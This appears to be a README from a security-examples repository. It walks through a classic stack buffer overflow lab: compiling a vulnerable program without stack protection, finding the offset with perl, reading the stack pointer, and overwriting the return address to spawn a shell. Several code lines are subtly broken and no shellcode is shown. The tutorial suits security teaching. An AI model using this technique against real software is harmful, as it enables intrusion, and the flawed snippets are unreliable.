Better be Safe than Sorry
A continuing updating repo of computer security examples and exploits.
General Unix Vulnerabilites
SQL Injections
Buffer Overflows
This is a through and detailen example on how buffer overflow works.
Buffer overflow happens when when a program writing data to a buffer, exceeds the bounds of the buffer, causing the excess data to overflow into adjacent memory.
From the example vulnerable code here, the buffer overflow can happen at the strcat line, where the boundary of the concatenated string appended into the buffer is not checked, causing an overflowed buffer.
Steps to exploit this vulnerability and invoking a shell is as follows:
- Complile the buffer_overflow.c with the following command, turning off the stack protection system and enabling debugging:
gcc buffer_overflow.c -g -fno_stack_protector -o buffer_overflow
- Figure out how many pops it takes for us to get to the end of the buffer, usually the number is a little bigger than the buffer size (500 for this example). In this example we are going to use a perl script
exploit.plto help us generate the needed 500ish characters:
#!/usr/bin/perl
printf "A" x500;
chmod +x exploit.pl to make sure it has the necessary permissions, then feed it into the buffer_overflow executable that we just compiled in gdb:
$gdb(buffer_overflow)
$(gdb)run `exploit.pl`
Modify the number of "A"s in the perl script so that the buffer is overflowed successfully it would show up as a segmentation fault at 0x41414141.
- Add a
stack.cthat looks like this:
#include <stdio.h>
unsigned long get_sp()
{
__asm__("mov %esp, %eax");
}
main()
{
printf("SP is: %lx\n\n", get_sp());
}
Compile it with gcc -m32 -o stack. This stack execuatble will print the current stack pointer that we will use later. Note that the stack pointer address doesn't change frequently, but it might be different if you run stack many commands away.
- Modify
exploit.plto look like the following (also avaliable here):
#!/usr/bin/perl
$RETURN_ADDRESS=0x'the sp address resulted from stack';
$RETURN_ADDRESS=$RETURN_ADDRESS - $ARGV[0];
$address = pack("l",$RETURN_ADDRESS); //Perl has its own built in function to modify the address to little endian
printf "A" x517$address; //517 is what I got. Put in your own number
Make sure you chmod +x exploit.pl after you finished modifiying it.
- You're almost all good to go! Type in
buffer_overflow `exploit.pl`. It'll be highly likely that you will seesegmentation fault, this is where$RETURN_ADDRESS=$RETURN_ADDRESS - $ARGV[0];in theexploit.plwill help modify the memory address a bit. Trybuffer_overflow `exploit.pl -1000`,buffer_overflow `exploit.pl 1000`etc. (Mine worked atbuffer_overflow `exploit.pl -2000`).
If all the steps are performed in order, and right, a shell should be exploited :D
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent